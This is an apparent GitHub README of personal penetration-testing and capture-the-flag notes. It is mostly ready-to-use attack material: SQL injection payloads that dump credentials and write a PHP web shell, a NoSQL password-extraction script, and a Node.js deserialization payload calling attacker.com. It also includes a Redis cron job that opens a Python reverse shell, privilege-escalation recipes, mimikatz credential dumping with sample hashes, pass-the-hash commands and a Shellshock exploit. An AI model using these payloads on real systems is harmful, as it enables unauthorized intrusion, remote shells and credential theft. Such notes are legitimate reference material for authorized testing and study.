`SELECT * FROM logins LIMIT 1, 2`	Only show first two results starting from index 2
`SELECT * FROM table_name WHERE <condition>`	List results that meet a condition
`SELECT * FROM logins WHERE username LIKE 'admin%'`	List results where the name is similar to a given string

MySQL Operator Precedence

Division (/), Multiplication (*), and Modulus (%)
Addition (+) and Subtraction (-)
Comparison (=, >, <, <=, >=, !=, LIKE)
NOT (!)
AND (&&)
OR (||)

SQL Injection

Payload	Description
Auth Bypass
`admin' or '1'='1`	Basic Auth Bypass
`admin')-- -`	Basic Auth Bypass With comments
Auth Bypass Payloads
Union Injection
`' order by 1-- -`	Detect number of columns using `order by`
`cn' UNION select 1,2,3-- -`	Detect number of columns using Union injection
`cn' UNION select 1,@@version,3,4-- -`	Basic Union injection
`UNION select username, 2, 3, 4 from passwords-- -`	Union injection for 4 columns
DB Enumeration
`SELECT @@version`	Fingerprint MySQL with query output
`SELECT SLEEP(5)`	Fingerprint MySQL with no output
`cn' UNION select 1,database(),2,3-- -`	Current database name
`cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -`	List all databases
`cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -`	List all tables in a specific database
`cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -`	List all columns in a specific table
`cn' UNION select 1, username, password, 4 from dev.credentials-- -`	Dump data from a table in another database
Privileges
`cn' UNION SELECT 1, user(), 3, 4-- -`	Find current user
`cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -`	Find if user has admin privileges
`cn' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE user="root"-- -`	Find if all user privileges
`cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -`	Find which directories can be accessed through MySQL
File Injection
`cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -`	Read local file
`select 'file written successfully!' into outfile '/var/www/html/proof.txt'`	Write a string to a local file
`cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -`	Write a web shell into the base web directory

Nosql

Grab password with JSON post request

import json
import requests
import string
import sys

url = 'http://10.10.11.139:5000/login'
def login(pw):
	payload = '{ "$regex": "%s" }' % pw
	data = { "user": "admin","password":json.loads(payload) }
	r = requests.post(url,json=data)
	if 'Invalid Password' in r.text:
		return False
	return True

password = '^'
stop = False
while stop == False:
	for i in string.ascii_letters:
		sys.stdout.write(f'\r{password}{i}')
		if login(f'{password}{i}'):
			password += i
			if login(f"{password}$"):
				sys.stdout.write(f'\r{password}\r\n')
				sys.stdout.flush()
				stop = True
				break
			break

Insecure deserialization

PHP serialization format

PHP uses a mostly human-readable string format, with letters representing the data type and numbers representing the length of each entry. For example, consider a User object with the attributes:

$user->name = "carlos";
$user->isLoggedIn = true;

When serialized, this object may look something like this: O:4:"User":2:{s:4:"name":s:6:"carlos"; s:10:"isLoggedIn":b:1;}

This can be interpreted as follows:

O:4:"User" - An object with the 4-character class name "User"
2 - the object has 2 attributes
s:4:"name" - The key of the first attribute is the 4-character string "name"
s:6:"carlos" - The value of the first attribute is the 6-character string "carlos"
s:10:"isLoggedIn" - The key of the second attribute is the 10-character string "isLoggedIn"
b:1 - The value of the second attribute is the boolean value true

Java serialization format

Some languages, such as Java, use binary serialization formats. This is more difficult to read, but you can still identify serialized data if you know how to recognize a few tell-tale signs. For example, serialized Java objects always begin with the same bytes, which are encoded as ac ed in hexadecimal and rO0 in Base64.

Any class that implements the interface java.io.Serializable can be serialized and deserialized. If you have source code access, take note of any code that uses the readObject() method, which is used to read and deserialize data from an InputStream.

Node.js deserialization vulnerability payload [RCE]

{"rce":"_$$ND_FUNC$$_function (){require('child_process').exec('ping attacker.com',function(error, stdout, stderr) { console.log(stdout) });}()"}

Modifying serialized data types

O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";i:0;}

Windows

Basic enumeration on linux and windows

Linux	Windows	Purpose of command
`whoami`	`whoami`	Name of current user
`uname -a`	`ver`	Operating system
`ifconfig`	`ipconfig /all`	Network configuration
`netstat -an`	`netstat -an`	Network connections
`ps -ef`	`tasklist`	Running processes

Windows SMB enumeration

nmap - SMB Vulnerabilities on Windows

nmap -p 445 --script smb-vuln-ms06-025 target-IP
nmap -p 445 --script smb-vuln-ms07-029 target-IP
nmap -p 445 --script smb-vuln-ms08-067 target-IP
nmap -p 445 --script smb-vuln-ms10-054 target-IP
nmap -p 445 --script smb-vuln-ms10-061 target-IP
nmap -p 445 --script smb-vuln-ms17-010 target-IP

MS SQL

Connect with the db with mssqlclient - github link

python3 mssqlclient.py -windows-auth [email protected]

dump mssql user hash with responder

target

SQL> xp_dirtree "\\<attacker-ip>\anything\"

attacker

root@kali:~# responder -I tun0

xfreerdp

login with the user hash

xfreerdp /u:user /d:domain /pth:011AD41795657A8ED80AB3FF6F078D03 /v:10.5.23.42

login with the user password

xfreerdp /u:user /d:domain /p:password /v:10.5.23.42

cURL Cheat Sheet

Command	Description
`curl -h`	cURL help menu
`curl inlanefreight.com`	Basic GET request
`curl -s -O inlanefreight.com/index.html`	Download file
`curl -k https://inlanefreight.com`	Skip HTTPS (SSL) certificate validation
`curl inlanefreight.com -v`	Print full HTTP request/response details
`curl -I https://www.inlanefreight.com`	Send HEAD request (only prints response headers)
`curl -i https://www.inlanefreight.com`	Print response headers and response body
`curl https://www.inlanefreight.com -A 'Mozilla/5.0'`	Set User-Agent header
`curl -u admin:admin http://<SERVER_IP>:<PORT>/`	Set HTTP basic authorization credentials
`curl http://admin:admin@<SERVER_IP>:<PORT>/`	Pass HTT basic authorization credentials in the URL
`curl -H 'Authorization: Basic YWRtaW46YWRtaW4=' http://<SERVER_IP>:<PORT>/`	Set request header
`curl 'http://<SERVER_IP>:<PORT>/search.php?search=le'`	Pass GET parameters
`curl -X POST -d 'username=admin&password=admin' http://<SERVER_IP>:<PORT>/`	Send POST request with POST data
`curl -b 'PHPSESSID=c1nsa6op7vtk7kdis7bcnbadf1' http://<SERVER_IP>:<PORT>/`	Set request cookies
`curl -X POST -d '{"search":"london"}' -H 'Content-Type: application/json' http://<SERVER_IP>:<PORT>/search.php`	Send POST request with JSON data

APIs

Command	Description
`curl http://<SERVER_IP>:<PORT>/api.php/city/london`	Read entry
`curl -s http://<SERVER_IP>:<PORT>/api.php/city/ \| jq`	Read all entries
`curl -X POST http://<SERVER_IP>:<PORT>/api.php/city/ -d '{"city_name":"HTB_City", "country_name":"HTB"}' -H 'Content-Type: application/json'`	Create (add) entry
`curl -X PUT http://<SERVER_IP>:<PORT>/api.php/city/london -d '{"city_name":"New_HTB_City", "country_name":"HTB"}' -H 'Content-Type: application/json'`	Update (modify) entry
`curl -X DELETE http://<SERVER_IP>:<PORT>/api.php/city/New_HTB_City`	Delete entry

Browser DevTools

Shortcut	Description
[`CTRL+SHIFT+I`] or [`F12`]	Show devtools
[`CTRL+SHIFT+E`]	Show Network tab
[`CTRL+SHIFT+K`]	Show Console tab

ZIP all in one

7z

args	value
`a`	add
`d`	delete
`e`	extract
`l`	list
`t`	test
`u`	update
`x`	extract with full paths

7z exit codes

code	value
`0`	normal (no errors or warnings)
`1`	warning (non-fatal errors)
`2`	fatal error
`7`	bad cli arguments
`8`	not enough memory for operation
`255`	process was interrupted

`command`	`what does`
`tar cf - directory 7z a -si directory.tar.7z`	to backup a directory
`7z -l examle.zip`	list the contents of an archive file
`7z l -slt examle.zip`	list files with full info
`7z a -tzip/gzip/bzip2/tar archived.zip path/to/file_or_directory`	archive using a specific archive type
`7z x archived.zip -so`	extract an archive to stdout
`7z x archived.zip -opath/to/output`	extract an archive with user-defined output path
`7z a encrypted.zip -ppassword -mhe=on archived.zip`	encrypt an existing archive (including headers)

Useful find commands example

find SUID files

find / -user root -perm /4000 2>/dev/null

find / -user root -perm -4000 -exec ls -ldb {}; > /tmp/suid

find / -type f -name '*.txt' 2>/dev/null

find / -perm -u=s -type f 2>/dev/null

getcap -r / 2>/dev/null

find and read all hidden flag.txt

cat $(find / -name flag.txt 2>/dev/null)

Keyboard shortcuts

Keyboard Shortcut	Use of the keyboard shortcut
`Ctrl-Alt-t`	Open a new Terminal
`Ctrl-d`	Close a terminal
`Ctrl-c`	Cancels the currently running command.
`Ctrl-l`	Clears the screen just like clear command
`Ctrl-a`	Move the cursor to the beginning of the line
`Ctrl-e`	Move the cursor to the end of the line
`Ctrl-f`	Move the cursor forward by one character
`Ctrl-b`	Move the cursor backward by one character
`Alt-f`	Move the cursor forward by one word
`Alt-b`	Move the cursor backward by one word
`Ctrl-d`	Delete the character at the cursor location
`Ctrl-t`	Exchange the character at the current location with the character at preceding it
`Ctrl-u`	Erases the complete line
`Alt-t`	Exchange the word at the current location with the word at preceding it
`Alt-l`	Move the cursor backward by one character
`Alt-u`	Convert the characters of a word to lowercase from the current cursor location
`Alt-b`	Convert the characters of a word to uppercase from the current cursor location

Simple bash port scanner

for PORT in {0..1000}; do timeout 1 bash -c "</dev/tcp/127.0.0.1/$PORT &>/dev/null" 2>/dev/null && echo "port $PORT is open"; done

Python virtual environment

install

 sudo apt install python3.9-venv

active

python3 -m venv env

┌──(kali㉿bughunt3r)-[~]
└─$ source env/bin/activate
                                                                                                                                                             
┌──(env)─(kali㉿bughunt3r)-[~]
└─$

notice that there is a variable added before the username & hostname.
now we are inside of the Python virtual environment.

Specific permission for specific user

no permission

setfacl -m u:username:000 myfolder/myfile

read-write-execute

setfacl -m u:username:rwx myfolder/myfile

readonly permission

setfacl -m u:username:r myfolder/myfile

read & write permission

setfacl -m u:username:rw myfolder/myfile

SMB enumeration

smbclient usage

List shares on a machine using NULL Session

smbclient -L

List shares on a machine using a valid username + password

smbclient -L <target-IP> -U username%password

Connect to a valid share with username + password

smbclient //<target>/<share$> -U username%password

List files on a specific share

smbclient //<target>/<share$> -c 'ls' password -U username

List files on a specific share folder inside the share

smbclient //<target>/<share$> -c 'cd folder; ls' password -U username

Download a file from a specific share folder

smbclient //<target>/<share$> -c 'cd folder;get desired_file_name' password -U username

Copy a file to a specific share folder

smbclient //<target>/<share$> -c 'put /var/www/my_local_file.txt .\target_folder\target_file.txt' password -U username

Create a folder in a specific share folder

smbclient //<target>/<share$> -c 'mkdir .\target_folder\new_folder' password -U username

Rename a file in a specific share folder

smbclient //<target>/<share$> -c 'rename current_file.txt new_file.txt' password -U username

enum4linux usage for smb enumeration

enum4linux - General enumeration - anonymous session

enum4linux -a <target>

enum4linux - General enumeration - authenticated session

enum4linux -a <target> -u <user> -p <pass>

enum4linux - Users enumeration

enum4linux -u <user> -p <pass> -U <target>

enum4linux - Group and members enumeration

enum4linux -u <user> -p <pass> -G <target>

enum4linux - Password policy

enum4linux -u <user> -p <pass> -P <target>

Using nmap for smb enumeration

nmap - Enum Users

nmap -p 445 --script smb-enum-users <target> --script-args smbuser=username,smbpass=password,smbdomain=domain nmap -p 445 --script smb-enum-users <target> --script-args smbuser=username,smbhash=LM:NTLM,smbdomain=domain

nmap --script smb-enum-users.nse --script-args smbusername=User1,smbpass=Pass@1234,smbdomain=workstation -p445 192.168.1.10

nmap --script smb-enum-users.nse --script-args smbusername=User1,smbhash=aad3b435b51404eeaad3b435b51404ee:C318D62C8B3CA508DD753DDA8CC74028,smbdomain=mydomain -p445 192.168.1.10

nmap - Enum Groups

nmap -p 445 --script smb-enum-groups <target> --script-args smbuser=username,smbpass=password,smbdomain=domain nmap -p 445 --script smb-enum-groups <target> --script-args smbuser=username,smbhash=LM:NTLM,smbdomain=domain

nmap - Enum Shares

nmap -p 445 --script smb-enum-shares <target> --script-args smbuser=username,smbpass=password,smbdomain=domain nmap -p 445 --script smb-enum-shares <target> --script-args smbuser=username,smbpass=LM:NTLM,smbdomain=domain

nmap - OS Discovery

nmap -p 445 --script smb-os-discovery <target>

nmap - SMB Vulnerabilities on Windows

nmap -p 445 --script smb-vuln-ms06-025 target-IP
nmap -p 445 --script smb-vuln-ms07-029 target-IP
nmap -p 445 --script smb-vuln-ms08-067 target-IP
nmap -p 445 --script smb-vuln-ms10-054 target-IP
nmap -p 445 --script smb-vuln-ms10-061 target-IP
nmap -p 445 --script smb-vuln-ms17-010 target-IP

Always check for updated list on https://nmap.org/nsedoc/scripts/ map - Brute Force Accounts (be aware of account lockout!)

nmap –p 445 --script smb-brute –script-args userdb=user-list.txt,passdb=pass-list.txt target-IP

Redis

SSH

Generate a ssh public-private key pair on your pc: ssh-keygen -t rsa
Write the public key to a file : (echo -e "\n\n"; cat ~/id_rsa.pub; echo -e "\n\n") > spaced_key.txt
Import the file into redis : cat spaced_key.txt | redis-cli -h 10.10.10.160 -x set ssh_key
Save the public key to the authorized_keys file on redis server:

kali@bughunt3r:~/htb/machines/postman$ echo "FLUSHALL" | redis-cli -h 10.10.10.160
OK                                                                                                        
kali@bughunt3r:~/htb/machines/postman$ cat ~/.ssh/id_rsa.pub | redis-cli -h 10.10.10.160 -x set ssh_key
OK                               
kali@bughunt3r:~/htb/machines/postman$ redis-cli -h 10.10.10.160
10.10.10.160:6379> config set dir /var/lib/redis/.ssh
OK
10.10.10.160:6379> config set dbfilename authorized_keys
OK
10.10.10.160:6379> config get dbfilename
1) "dbfilename"
2) "authorized_keys"
10.10.10.160:6379> save
OK

ssh -i ~/.ssh/id_rsa [email protected]

RCE

root@Urahara:~# echo -e "\n\n*/1 * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.16.10\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n\n"|redis-cli -h 10.10.10.160 -x set 1
OK
root@Urahara:~# redis-cli -h 10.10.10.160 config set dir /var/spool/cron/
OK
root@Urahara:~# redis-cli -h 10.10.10.160 config set dbfilename root
OK
root@Urahara:~# redis-cli -h 10.10.10.160 save
OK

lxc/lxd Privilege Escalation

git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

upload the apline-v3.10-x86_64-someting-.tar.gz file from the attacker machine

python -m SimpleHTTPServer

download the apline-v3.10-x86_64-someting.tar.gz file to victim machine

cd /tmp
wget http://attacker-machine-ip:8000/apline-v3.10-x86_64-someting.tar.gz

import the lxc image

lxc image import ./alpine-v3.10-x86_64-20191008_1227.tar.gz --alias myimage

check the lxc image

lxc image list

run these commands on target machine

lxc init
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
id

Perl setuid capability privesc

if the perl has the cap_setuid+ep permission set.
then it means perl has capability of changing UID.

akrech@akr3ch:/tmp$ getcap -r / 2>/dev/null
/usr/bin/perl = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

create a perl file

akrech@akr3ch:/tmp$ cat root.pl
#!/usr/bin/perl
use POSIX qw(setuid);
POSIX::setuid(0);
exec "/bin/bash";

akrech@akr3ch:/tmp$ ./root.pl
root@akr3ch:/tmp# id
uid=0(root) gid=1000(akrech) groups=1000(akrech)

Windows privesc

metasploit

local_exploit_suggester

module

post/multi/recon/local_exploit_suggester

example

meterpreter > run post/multi/recon/local_exploit_suggester

[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 40 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[-] 10.10.10.5 - Post interrupted by the console user

mimikatz kiwi

After obtaining a meterpreter shell, we need to ensure that our session is running with SYSTEM level privileges for Mimikatz to function properly.

meterpreter > getuid
Server username: WINXP-E95CE571A1\Administrator

meterpreter > getsystem
...got system (via technique 1).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Mimikatz supports 32bit and 64bit Windows architectures. After upgrading our privileges to SYSTEM, we need to verify, with the sysinfo command, what the architecture of the compromised machine is. This will be relevant on 64bit machines as we may have compromised a 32bit process on a 64bit architecture. If this is the case, meterpreter will attempt to load a 32bit version of Mimikatz into memory, which will cause most features to be non-functional. This can be avoided by looking at the list of running processes and migrating to a 64bit process before loading Mimikatz.

meterpreter > sysinfo
Computer        : HARIS-PC
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_GB
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows

Since this is a 64bit machine, we can proceed to load the Mimikatz module into memory.

meterpreter > load mimikatz
[!] The "mimikatz" extension has been replaced by "kiwi". Please use this in future.
[!] The "kiwi" extension has already been loaded.
meterpreter > help kiwi

Kiwi Commands
=============

    Command                Description
    -------                -----------
    creds_all              Retrieve all credentials (parsed)
    creds_kerberos         Retrieve Kerberos creds (parsed)
    creds_livessp          Retrieve Live SSP creds
    creds_msv              Retrieve LM/NTLM creds (parsed)
    creds_ssp              Retrieve SSP creds
    creds_tspkg            Retrieve TsPkg creds (parsed)
    creds_wdigest          Retrieve WDigest creds (parsed)
    dcsync                 Retrieve user account information via DCSync (unparsed)
    dcsync_ntlm            Retrieve user account NTLM hash, SID and RID via DCSync
    golden_ticket_create   Create a golden kerberos ticket
    kerberos_ticket_list   List all kerberos tickets (unparsed)
    kerberos_ticket_purge  Purge any in-use kerberos tickets
    kerberos_ticket_use    Use a kerberos ticket
    kiwi_cmd               Execute an arbitary mimikatz command (unparsed)
    lsa_dump_sam           Dump LSA SAM (unparsed)
    lsa_dump_secrets       Dump LSA secrets (unparsed)
    password_change        Change the password/hash of a user
    wifi_list              List wifi profiles/creds for the current user
    wifi_list_shared       List shared wifi profiles/creds (requires SYSTEM)

now we can simply use those above commands to privesc our target machine
here are some examples cheds_all

meterpreter > creds_all 
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username       Domain    NTLM                              SHA1
--------       ------    ----                              ----
Administrator  haris-PC  cdf51b162460b7d5bc898f493751a0cc  dff1521f5f2d7436a632d26f079021e9541aba66

wdigest credentials
===================

Username       Domain     Password
--------       ------     --------
(null)         (null)     (null)
Administrator  haris-PC   ejfnIWWDojfWEKM
HARIS-PC$      WORKGROUP  (null)

kerberos credentials
====================

Username       Domain     Password
--------       ------     --------
(null)         (null)     (null)
Administrator  haris-PC   (null)
haris-pc$      WORKGROUP  (null)

cheds_msv

meterpreter > creds_msv
[+] Running as SYSTEM                                                                                                                                        
[*] Retrieving msv credentials                                                                                                                               
msv credentials                                                                                                                                              
===============                                                                                                                                              
                                                                                                                                                             
Username       Domain    NTLM                              SHA1                                                                                              
--------       ------    ----                              ----                                                                                              
Administrator  haris-PC  cdf51b162460b7d5bc898f493751a0cc  dff1521f5f2d7436a632d26f079021e9541aba66

password_change

meterpreter > password_change -p ejfnIWWDojfWEKM -P akrech404 -u Administrator
[*] No server (-s) specified, defaulting to localhost.
[+] Success! New NTLM hash: 2081d1de9b8df44ed3a37963ae802d10

Login with the new password

┌──(kali㉿bughunt3r)-[/opt/win]
└─$ python3 psexec.py Administrator:[email protected]
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 10.10.10.40.....
[*] Found writable share ADMIN$
[*] Uploading file MiONxDaQ.exe
[*] Opening SVCManager on 10.10.10.40.....
[*] Creating service xXQL on 10.10.10.40.....
[*] Starting service xXQL.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>

mimikatz

If you have an LSASS dump, you can use the minidump module

mimikatz # sekurlsa::minidump lsass.DMP

mimikatz # sekurlsa::logonPasswords /full

You can upload mimikatz to a remote machine with smbclient
Or you can use crackmapexec
Executon may fail but the binary will be uploaded in C:\Windows\mimikatz.exe

crackmapexec IP -u user -p password -M mimikatz

Then you can execute remotely through winexe

winexe -U admin%password //IP C:\\Windows\\mimikatz.exe

Password dumping

mimikatz # privilege::debug
mimikatz # sekurlsa::logonPasswords /full

In case of Mimikatz is trigerred on the target machine, you can try bring it up using network share

sudo python smbserver.py SHARE /home/xxxxx/share_path/

sudo ./venv/bin/crackmapexec smb IP -u "xxx" -p "xxx" -X '\\share_ip\SHARE\mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords /full" exit > \\share_ip\SHARE\mimiout_$env:computername.txt'

In order to be stealthier, you can even do the same for procdump

sudo ./venv/bin/crackmapexec smb IP -u "xxx" -p "xxx" -X '\\share_ip\SHARE\procdump.exe "TODO"'

impacket

github link

psexec

remote code execution

python psexec.py domain/user:password@IP <command>

Shell via pass-the-hash:

python psexec.py -hashes:<hash> <user_name>@<remote_hostname>

Shell via pass-the-password:

python psexec.py Administrator:<password>4@<remote_hostname>

Shell via no-pass

python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

smbexec

remote code execution

python smbexec.py domain/user:password@IP <command>

wmiexec

remote code execution

python wmiexec.py domain/user:password@IP <command>

dcomexec

remode code execution

python dcomexec.py domain/user:password@IP <command>

crackmapexec

over a subnet and extract SAM file:

python crackmapexec -u Administrator -H :011AD41795657A8ED80AB3FF6F078D03 <target_IP> --sam

smbclient

Browse shares via pass-the-hash:

python smbclient.py <target_domain>/Administrator@target_IP -hashes 01[...]03:01[...]03

a generic SMB client that will let you list shares and files, rename,
upload and download files and create and delete directories

smbclient.py domain/user:password@IP
smbclient.py -dc-ip <attacker_IP> -target-ip <target_IP>> domain/user:password

evil-wimrm

github link

install with gem sudo gem install evil-winrm

if you are using kali-linux; then it can be easily installed by sudo apt install evil-winrm

Simple usage

connect with the target

evil-winrm -i <target_IP> -u <user> -p <password>

download & upload files

upload

upload local_filename (destination_filename)

download

download remote_filename (destination_filename)

Android

ADB Basics

COMMAND	EXPLANATION
`adb devices`	lists connected devices
`adb root`	restarts adb with root permissions
`adb start-server`	starts the adb server
`adb kill-server`	kills the adb server
`adb reboot`	reboots the device
`adb devices -l`	list of devices by product/model
`adb shell`	starts the backround terminal
`exit`	exits the background terminal
`adb help`	list all commands
`adb -s <deviceName> <command>`	redirect command to specific device
`adb –d <command>`	directs command to only attached USB device
`adb –e <command>`	directs command to only attached emulator

Package Installation

COMMAND	EXPLANATION
`adb install <apk>`	install app
`adb install <path>`	install app from phone path
`adb install -r <path>`	install app from phone path
`adb uninstall <name>`	remove the app

File Operations

LOCATOR	EXPLANATION
`adb push <local> <remote>`	copy file/dir to device
`adb pull <remote> <local>`	copy file/dir from device
`run-as <package> cat <file>`	access the private package file

Phone Info

COMMAND	EXPLANATION
`adb get-statе`	print device state
`adb get-serialno`	get the serial number
`adb shell dumpsys iphonesybinfo`	get the IMEI
`adb shell netstat`	list TCP connectivity
`adb shell pwd`	print current working directory
`adb shell dumpsys battery`	battery status
`adb shell pm list features`	list phone features
`adb shell service list`	list all services
`adb shell dumpsys activity <package>/<activity>`	activity info
`adb shell ps`	print process status
`adb shell wm size`	displays the current screen resolution

Paths

COMMAND	EXPLANATION
`/data/data/<package>/databases`	app databases
`/data/data/<package>/shared_prefs/`	shared preferences
`/data/app`	apk installed by user
`/system/app`	pre-installed APK files
`/mmt/asec`	encrypted apps / App2SD
`/mmt/emmc`	internal SD Card
`/mmt/adcard`	external/Internal SD Card
`/mmt/adcard/external_sd`	external SD Card

Configure Settings Commands

COMMAND	EXPLANATION
`adb shell dumpsys battery set level <n>`	change the level from 0 to 100
`adb shell dumpsys battery set status <n>`	change the level to unknown,charging, discharging, not charging or full
`adb shell dumpsys battery reset`	reset the battery
`adb shell dumpsys battery set usb <n>`	change the status of USB connection ON or OFF
`adb shell wm size WxH`	sets the resolution to WxH

Table

COMMAND	EXPLANATION
`adb shell list packages`	list package names
`adb shell list packages -r`	list package name + path to apks
`adb shell list packages -3`	list third party package names
`adb shell list packages -s`	list only system packages
`adb shell list packages -u`	list package names + uninstalled
`adb shell dumpsys package packages`	list info on all apps
`adb shell dump <name>`	list info on one package
`adb shell path <package>`	path to the apk file

Logs

COMMAND	EXPLANATION
`adb logcat [options] [filter]`	view device log
`adb bugreport`	print bug reports

Permissions

COMMAND	EXPLANATION
`adb shell permissions groups`	list permission groups definitions
`adb shell list permissions -g -r`	list permissions details

Device Related Commands

COMMAND	EXPLANATION
`adb reboot-recovery`	reboot device into recovery mode
`adb reboot fastboot`	reboot device into recovery mode
`adb shell screencap -p "/path/to/screenshot.png"`	capture screenshot
`adb shell screenrecord "/path/to/record.mp4"`	record device screen
`adb backup -apk -all -f backup.ab`	backup settings and apps
`adb backup -apk -shared -all -f backup.ab`	backup settings, apps and shared storage
`adb backup -apk -nosystem -all -f backup.ab`	backup only non-system apps
`adb restore backup.ab`	restore a previous backup
`adb shell am start -a android.intent.action.VIEW -d URL`	open URL
`adb shell am start -t image/* -a android.intent.action.VIEW`	opens gallery

Network

COMMAND	EXPLANATION
`adb shell settings put global http_proxy 10.10.14.16:8080`	Set a `proxy` to intercept requests
`adb shell settings put global http_proxy :0`	Remove `proxy`

Extra notes

make NTML hash from password

python -c 'import hashlib,binascii; print binascii.hexlify(hashlib.new("md4", "<password>".encode("utf-16le")).digest())'

snap

sudo apt install snapd

service snapd start

sudo systemctl start snapd.service

SMTP

install smtp mail reader

sudo apt install evolution

SQLi XSS SSTI

one line payload

<svg onload="prompt(5);">{{7*7}}</svg>

ShellShock

exploit by curl

curl -H 'User-Agent: () { :; }; echo ; echo ; /usr/bin/id' bash -s :'' http://10.10.10.56/cgi-bin/user.sh

grep

emails

grep -Eiorh '([[:alnum:]_.-]+@[[:alnum:]_.-]+?\.[[:alpha:].]{2,6})' "$@" file.txt | sort | uniq > emails.txt

urls

cat file.txt | grep -Eo "(http|https)://[a-zA-Z0-9./?=_%:-]*" | sort -u

Password List

Convert each password to base64

while read line; do echo -n -i $line | base64 >> base64-passwords.txt; done < passwords.txt

Name		Name	Last commit message	Last commit date
Latest commit History 140 Commits
assets/img		assets/img
README.md		README.md

akr3ch/CheatSheet

Folders and files

Latest commit

History

Repository files navigation

just a part of my private notes - public

Contents:

BugBounty

Linux

Windows

Linux Privesc

Windows privesc

Android

Extra notes

Payloads

Log4j

":-" notation

Unicode Characters (JSON REST API request)

"::-" notation

JSON

bypass admin login on sql misconfig

RCE

PHPMailer

CVE-2016-10033: PHPMailer RCE Exploitation

Node.js

node.js calculate() rce with json body

One liner BugBounty

XSS finder

CMS exploitation

Wordpress

basic enumeration on xmlrpc.php file - (if enabled)

Basic Enumeration

Find Subdomains

wfuzz

sublist3r

gobuster

DNS enumeration

Brute Force

Hydra

Polyglot payloads

XSS polyglot

SQLi polyglot

JS/URL polyglot

Cookie hacking

JWT follow the following pattern:

JWT secret bruteforce (crack)

hashcat

jwt-tool

Tamper jwt token content

Bypass technics

Bypass File Upload Filtering

Bypass 401/403

Try differnet verbs to access the file-> GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK

Bypass 429

Rate Limiting Bypass : 429 Too many Requests

Append the headers to a request where the server is responding with 429

Bypass password reset

Bypass LFI WAF

Open web redirect

Open web redirect common payloads

source

XSS

Common payloads

XSS to LFI

most common payloads

Top XSS dorks

XXE common payloads

XXE: read local files

use replace funtion if case sensitive

XXE - Out-of-band - payloads

Send the content of /etc/passwd to www.akr3ch.com, you may receive only the first line.

XXE file read via XInclude payload as parameter value

payload

url encoded payload

Request demo

Response demo

XXE to RCE

XXE to SSRF

XXE inside SVG

source

`bypass admin login on sql misconfig`

`CVE-2016-10033: PHPMailer RCE Exploitation`

`node.js calculate() rce with json body`

basic enumeration on `xmlrpc.php` file - (if enabled)

`wfuzz`

`sublist3r`

`gobuster`

`hashcat`

`jwt-tool`

Try differnet verbs to access the file-> `GET`, `HEAD`, `POST`, `PUT`, `DELETE`, `CONNECT`, `OPTIONS`, `TRACE`, `PATCH`, `INVENTED`, `HACK`

Rate Limiting Bypass : `429 Too many Requests`

Append the headers to a request where the server is responding with `429`

Send the content of `/etc/passwd` to `www.akr3ch.com`, you may receive only the first line.

`payload`

`url encoded payload`

`Request demo`

`Response demo`

`Polyglot`

`FreeMarker (Java)`

`Java`

`Golang`

`Twig (PHP)`

`Smarty (PHP)`

`Handlebars(NodeJS)`

`Velocity`

`ERB (Ruby)`

`Django Tricks (Python)`

`Tornado (Python)`

`Mojolicious (Perl)`

`Flask/Jinja2: Identify`

`Flask/Jinja2`

`Jade`

`Razor (.Net)`

[2] if the app reflects the output as `49`.Then there might be a RCE possible.

`bypass common WAF`